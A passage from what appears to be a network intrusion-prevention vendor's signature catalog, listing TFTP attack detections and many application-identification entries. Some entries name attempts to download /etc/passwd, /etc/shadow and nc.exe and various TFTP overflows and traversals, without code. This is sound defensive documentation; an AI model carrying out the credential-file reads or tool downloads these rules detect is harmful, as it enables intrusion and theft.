TFTP_CS-TFTP-Error-Response-With-Same-Source-And-Destination-Ports

About this situation: An unusual TFTP response detected
Context: TFTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, CVE2024, Any Operating System not specific, Any Software not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Vulnerability: Loop-Denial-Of-Service-CVE-2024-2169
Description:
Back to top

TFTP_Distinct-TFTP-Directory-Traversal

About this situation: An attempt to exploit a Distinct TFTP Directory Traversal vulnerability detected.
Context: TFTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Distinct, CVE2012, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Distinct-TFTP-Directory-Traversal
Description:
Back to top

TFTP_Filename

About this situation: TFTP filename
Context: TFTP without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Description: TFTP filename reported according to policy.
Back to top

TFTP_GE-D20-Config-File-Change-Attempt

About this situation: GE D20 Configuration file change attempt detected
Context: TFTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, GE D20, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: GE-D20-Commands
Description:
Back to top

TFTP_GE-ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow

About this situation: ProSysInfo TFTP Server TFTPDWIN 0.4.2 Stack Based Buffer Overflow
Context: TFTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, ProSysInfo, CVE2006, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow
Description:
Back to top

TFTP_General-Electric-D20-Password-Recovery

About this situation: An attempt to exploit a General Electric D20 Password Recovery vulnerability detected.
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, General Electric, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: General-Electric-D20-Password-Recovery
Description:
Back to top

TFTP_Get-Boot.ini

About this situation: Detects attempts to download boot.ini
Context: TFTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Disclosure
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

TFTP_Get-dllhost.exe

About this situation: Detects attempts to download dllhost.exe
Context: TFTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-478-5211
Description:
Back to top

TFTP_Get-Etc-Passwd

About this situation: Detects attempts to download /etc/passwd
Context: TFTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Disclosure
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-618-5211
Description:
Back to top

TFTP_Get-Etc-Shadow

About this situation: Detects attempts to download /etc/shadow
Context: TFTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Disclosure
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-342-4219
Description:
Back to top

TFTP_Get-Nc.exe

About this situation: Detects attempts to download nc.exe
Context: TFTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

TFTP_Get-Passwd

About this situation: Detects attempts to download /passwd
Context: TFTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Potential Disclosure
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Description:
Back to top

TFTP_Get-Svchost.exe

About this situation: Detects attempts to download Svchost.exe
Context: TFTP Client Stream
Severity: 2
Tags: Unix, Any Hardware, Unix not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-478-5211
Description:
Back to top

TFTP_Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal

About this situation: An attempt to exploit an Ipswitch WhatsUp Gold TFTP Directory Traversal vulnerability detected.
Context: TFTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Ipswitch WhatsUp Gold, CVE2011, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Ipswitch-WhatsUp-Gold-TFTP-Directory-Traversal
Description:
Back to top

TFTP_MADCAP-Request-Message-With-Lease-Identifier-Option

About this situation: MADCAP REQUEST Message with a Lease Identifier option
Context: TFTP Client Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Description:
Back to top

TFTP_Microsoft-RIS-TFTP-Write-Access

About this situation: TFTP System File Write Access
Context: TFTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft RIS TFTP Server, MS2006-12, CVE2006, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-87-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: TFTP-Microsoft-RIS-TFTP-Service-Write-Access-Vulnerability
Description:
Back to top

TFTP_Nessus-Vulnerability-Scanner-Usage

About this situation: Detects TFTP requests used by the Nessus vulnerability scanner
Context: TFTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Nessus, Any Operating System not specific, Potential Probe
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-532-5211
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

TFTP_NetDecision-TFTP-Directory-Traversal-Execution

About this situation: An attempt to exploit a NetDecision TFTP Directory Traversal Execution vulnerability detected.
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetMechanica NetDecision, CVE2009, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: NetDecision-TFTP-Directory-Traversal-Execution
Description:
Back to top

TFTP_PacketTrap-TFTP-Server-Denial-Of-Service

About this situation: An attempt to exploit a PacketTrap TFTP Server Denial Of Service vulnerability detected.
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PacketTrap TFTP Server, CVE2008, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: PacketTrap-TFTP-Server-Denial-Of-Service
Description:
Back to top

TFTP_Read-Or-Write-Request-Excessively-Long-Filename

About this situation: Excessively long filename in a TFTP read or write request detected
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FutureSoft TFTP Server 2000, TFTP Server SP, CVE2002, CVE2005, CVE2006, CVE2007, CVE2008, CVE2009, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-647-5211
Vulnerability: TFTP-FutureSoft-TFTP-Server-Buffer-Overflow
TFTP-TFTP-Server-SP-Long-Filename-Buffer-Overflow
Dnsmasq-TFTP-Service-Remote-Heap-Buffer-Overflow
Allied-Telesyn-TFTP-Server-Buffer-Overflow
D-Link-TFTP-Server-Buffer-Overflow
Tftpd32-Long-Filename-Buffer-Overflow
Description:
Back to top

TFTP_Read_Violation

About this situation: TFTP read attempted
Context: TFTP without parameters
Severity: 6
Tags: Inspection
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Description: TFTP read attempted, but blocked according to policy.
Back to top

TFTP_Solarwinds-TFTP-Server-Denial-Of-Service

About this situation: An attempt to exploit a Solarwinds TFTP Server Denial Of Service vulnerability detected.
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds TFTP, CVE2010, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: Solarwinds-TFTP-Server-Denial-Of-Service
Description:
Back to top

TFTP_SS-Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in cURL Project cURL detected
Context: TFTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, cURL, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1240-5242
Vulnerability: Curl-And-Libcurl-TFTP-blksize-Heap-Buffer-Overflow
Description:
Back to top

TFTP_SS-Executable-File-Download

About this situation: Executable file transfer detected
Context: TFTP Server Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-374-4219
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

TFTP_TFTP-Server-Error-Packet-Handling-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in TFTP Server detected
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TFTP Server SP, CVE2008, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: TFTP-TFTP-Server-Error-Packet-Handling-Buffer-Overflow
Description:
Back to top

TFTP_TFTP32d-Format-String-Vulnerability

About this situation: Format string vulnerability Trivial File Transfer Protocol
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TFTP32d, CVE2006, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-349-4219
Last changed: sgpkg-ips-349-4219
Vulnerability: TFTP32d-Format-String-Vulnerbility
Description:
Back to top

TFTP_TFTP32d-Format-String-Vulnerability-Poc

About this situation: Format string vulnerability Trivial File Transfer Protocol
Context: TFTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TFTP32d, CVE2006, Any Operating System not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-349-4219
Last changed: sgpkg-ips-349-4219
Vulnerability: TFTP32d-Format-String-Vulnerbility
Description:
Back to top

TFTP_Trivial-File-Transfer-Protocol-Directory-Traversal

About this situation: Directory traversal in Trivial File Transfer Protocol
Context: TFTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, FutureSoft TFTP Server 2000, CVE2005, CVE2023, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: TFTP-FutureSoft-TFTP-Server-Directory-Traversal
D-Link-D-View-Tftpreceivefilehandler-Directory-Traversal
Description:
Back to top

TFTP_Trivial-File-Transfer-Protocol-Mode-String-Buffer-Overflow

About this situation: Mode string buffer overflow in Trivial File Transfer Protocol
Context: TFTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, 3Com TFTP Server, FutureSoft TFTP Server 2000, CVE2005, CVE2006, CVE2008, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-207-2032
Vulnerability: TFTP-FutureSoft-TFTP-Server-Buffer-Overflow
TFTP-3Com-TFTP-Server-Transporting-Mode-Remote-Buffer-Overflow
TallSoft-Quick-TFTP-Server-Pro-2.1-Buffer-Overflow
Description:
Back to top

TFTP_UDP-Your-Freedom-UDP-Packet

About this situation: A Your Freedom TFTP packet detected
Context: TFTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

TFTP_Write_Violation

About this situation: TFTP write attempted
Context: TFTP without parameters
Severity: 6
Tags: Inspection
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Description: TFTP write was attempted, but blocked according to policy.
Back to top

Thales-e-Security

About this situation: Application Thales-e-Security detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Thales e-Security is a provider of HSMs, Key Management, Network Encryption, Time Stamping, and other data security solutions that deliver operational efficiency.
Back to top

Thawte-Certifate-Revocation-List-Service

About this situation: Thawte Certificate Revocation List service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-773-5211
Description: Thawte Certificate Revocation List (CRL) service usage has been detected.
Back to top

Thawte-Online-Certificate-Status-Service

About this situation: Thawte Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-758-5211
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

The-Billing-Bridge

About this situation: Application The-Billing-Bridge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: BillingParadise a medical billing and revenue management firm.
Back to top

The-College-Board

About this situation: Application The-College-Board detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The College Board is an organization that connects students to college opportunity.
Back to top

The-Currentset

About this situation: Application The-Currentset detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Procore's comprehensive cloud-based project management software automates RFIs, Submittals, Documents, Photos, Punch Lists, Daily Logs, Scheduling, Bidding.
Back to top

The-Friendship-Page

About this situation: The Friendship Page usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

The-Funded

About this situation: Application The-Funded detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TheFunded.com allows entrepreneurs to research, rate, and review venture capital sources worldwide.
Back to top

The-Guardian

About this situation: The Guardian usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: The Guardian is the online version of a British newspaper.
Back to top

The-Hello-Bar

About this situation: Application The-Hello-Bar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hello Bar is optimization tool that allows you to show the right message at the right time to your website visitors.
Back to top

The-IdeaWall

About this situation: Application The-IdeaWall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The IdeaWall gives companies the ability to Capture, Manage and Prioritize Customer Feedback through an online tool that is globally available and easy to use.
Back to top

The-Invoice-Machine

About this situation: The Invoice Machine usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: The Invoice Machine is ideal for freelancers and businesses who want an easy way to manage, create and send their invoices.
Back to top

The-iPad-Receptionist

About this situation: Application The-iPad-Receptionist detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The iPad Receptionist is the visitor management system available.
Back to top

The-Ladders

About this situation: Application The-Ladders detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TheLadders is an online job-matching service, committed to finding the right person for the right job. The company helps job seekers connect with employers and recruiters more effectively and efficiently.
Back to top

The-Life-Cloud

About this situation: Application The-Life-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Life Cloud isonline space where children, school staff, parents and Governors can share information, online tools and learning resources.
Back to top

The-Loyalty-Box

About this situation: Application The-Loyalty-Box detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: The Loyalty Box is a solution for small to midsize retailers looking to reward customers and gain a deeper insight into their buying habits.
Back to top

The-Motley-Fool

About this situation: The Motley Fool usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-657-5211
Description: This free website offers stock news and analysis, as well as paid investment advice services. Source:Wikipedia
Back to top

The-National-Association-of-Personal-Financial-Advisors

About this situation: Application The-National-Association-of-Personal-Financial-Advisors detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The National Association of Personal Financial Advisors is financial planning trade organization.
Back to top

The-Old-Reader

About this situation: The Old Reader usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-532-5211
Last changed: sgpkg-ips-788-5211
Description: The Old Reader is a web based RSS feed reader.
Back to top

The-Onion

About this situation: The Onion usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: The Onion is an American digital media company and news satire organization. It runs an entertainment website featuring satirical articles reporting on international, national, and local news. Source: Wikipedia.
Back to top

The-PDF-Chef

About this situation: Application The-PDF-Chef detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PageTiger helps you create interactive online publications, upload PDF or create one using TigerDesigner. Add clickable links, videos, polls, surveys and competitions then publish.
Back to top

The-Pirate-Bay

About this situation: The Pirate Bay usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-650-5211
Description: The Pirate Bay is a well known BitTorrent and Magnet Link Tracker.
Back to top

The-PNC-Financial-Services-Group

About this situation: Application The-PNC-Financial-Services-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The PNC Financial Services Group is a financial services organizations providing retail and business banking, residential mortgage banking, services for corporations and government entities, including corporate banking, real estate finance and asset-based lending, wealth management and asset management.
Back to top

The-Receptionist

About this situation: Application The-Receptionist detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: The Receptionist is an iPad Visitor Management system for a simple visitor logging system to track your visitor traffic, or require a fully customizable, SMS and email based, two-way communication system with badge printing,
Back to top

The-Register

About this situation: The Register usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-628-5211
Description: The Register is a online news service.
Back to top

The-Resumator

About this situation: The Resumator usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Applicant Tracking System and Recruiting Software.
Back to top

The-Tax-Institute

About this situation: Application The-Tax-Institute detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Tax Institute, formerly the Taxation Institute of Australia, is a member-based association of tax professionals in Australia. Members include accountants, lawyers and academics.
Back to top

The-Verge

About this situation: The Verge usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: The Verge usage detected. The Verge is an online magazine operated by Vox Media.
Back to top

The-Wall-Street-Journal

About this situation: The Wall Street Journal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1144-5242
Description: The Wall Street Journal is an international daily newspaper based in New York City.
Back to top

TheCodingMonkeys-Carcassonne

About this situation: Carcassonne usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1638-5242
Description: Carcassonne is a mobile board game.
Back to top

Thelevelup

About this situation: Application Thelevelup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LevelUp helps merchants own the shift to mobile by powering mobile-payment optimized loyalty programs, enabling their customers pay for their purchase and accrue
Back to top

TheNextUp

About this situation: Application TheNextUp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Next Up offers patent pending technology for automotive dealerships that enhances the automotive dealer sales process.
Back to top

TheOfferMachine

About this situation: Application TheOfferMachine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: TheOfferMachine.com is a SaaS platform that enables performance marketers to design pages, construct forms and route data.
Back to top

ThePDF.com

About this situation: Application ThePDF.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThePDF.com is an online PDF converter that allows to convert, merge, split PDF files. Its set of tools also includes a PDF Unlocker which removes passwords and protection on a PDF file.
Back to top

Therapy-Partner

About this situation: Application Therapy-Partner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Therapy Partner is a web-based practice management software solution designed for private practitioners.
Back to top

ThingLink

About this situation: Application ThingLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThingLink enables adding interactive tags to any image on the web and share the tagged images on social networks, blogs and personal website.
Back to top

ThinkFree

About this situation: ThinkFree usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-630-5211
Description: ThinkFree Office is an online office suite based on Java technologies. ThinkFree consists of a word processor (Write), a spreadsheet (Calc), a presentation program (Show), and a blog editor (Note). The ThinkFree application is available at site https://www.thinkfree.com.
Back to top

ThinkingPhone

About this situation: Application ThinkingPhone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThinkingPhone unify all of your voice, text, and conferencing services on a single cloud platform.
Back to top

Thinkorswim

About this situation: thinkorswim usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: thinkorswim offers investor education, brokerage, and related financial products and services for self-directed investors. Source: Wikipedia
Back to top

Thinkstock

About this situation: Application Thinkstock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Thinkstock is an image subscription service that offers photos, vectors and illustrations.
Back to top

ThinkWave

About this situation: Application ThinkWave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThinkWave provides an online gradebook for teachers and an school admin system with parent and student access.
Back to top

THINQ-Compliance-Manager

About this situation: Application THINQ-Compliance-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: THINQ provides compliance solutions to a broad range of pharmaceutical,medical device and biotechnology companies.
Back to top

Third-Light-IMS

About this situation: Application Third-Light-IMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Third Light IMS is a digital asset management tool designed for businesses wishing to establish a web-based media library. It is an feature-rich system designed for intensive use by departmental groups and marketing teams.
Back to top

ThisData

About this situation: Application ThisData detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThisData protects your organization by identifying and monitoring the people who have access to your data.
Back to top

ThisMoment-DEC-CMS

About this situation: Application ThisMoment-DEC-CMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Thismoment offers content marketing platform for discovering, mixing and sharing digital content everywhere, also include content cloud
Back to top

Thomson-Reuters

About this situation: Application Thomson-Reuters detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Thomson Reuters provides intelligence, technology and human expertise.
Back to top

ThoughtBuzz

About this situation: Application ThoughtBuzz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThoughtBuzz is a Web-based and real-time application for tracking public content on social media networks.
Back to top

ThousandEyes

About this situation: Application ThousandEyes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThousandEyes provides SaaS-based network monitoring that identifies performance problems with applications and underlying network infrastructure.
Back to top

ThreatMetrix

About this situation: Application ThreatMetrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThreatMetrix provides software as a service (SaaS) technology that profiles online transactions and activities to determine whether they initiate from fraudsters or legitimate customers.
Back to top

Threatseeker-Cloud

About this situation: Threatseeker Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-884-5242
Description: Threatseeker Cloud online services usage has been detected.
Back to top

Threatseeker-Data-Provider-Error

About this situation: Threatseeker data provider query returned an error
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Threatseeker data provider query returned an error.
Back to top

Threatseeker-No-Categories

About this situation: Threatseeker returned zero categories
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Threatseeker returned zero categories
Back to top

Three.com.hk

About this situation: Application Three.com.hk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3 Hong Kong is mobile service provider in Hong Kong offering advanced voice, data and roaming services under the 3 brand via its 4G LTE, 3G and GSM dual-band networks
Back to top

Threshold exceeded

About this situation: Custom threshold limit exceeded.
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-223-3038
Last changed: sgpkg-ips-223-3038
Description: Custom threshold of $([[$LN_THRESHOLD_DESCRIPTION]]) defined in Overview "$([[$LN_OVERVIEW_NAME]]), $([[$LN_OVERVIEW_SECTION]])" was exceeded. Value $([[$LN_THRESHOLD_MEASURED_VALUE]]) was reached at $([[$LN_THRESHOLD_CHECK_TIME]])
Back to top

Thunderbird

About this situation: Endpoint Context Agent based Thunderbird detection
Context: EI Correlation
Severity: 1
Tags: Email, Endpoint
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Description: Mozilla Thunderbird email endpoint application has been detected.
Back to top

ThunderMaps

About this situation: Application ThunderMaps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
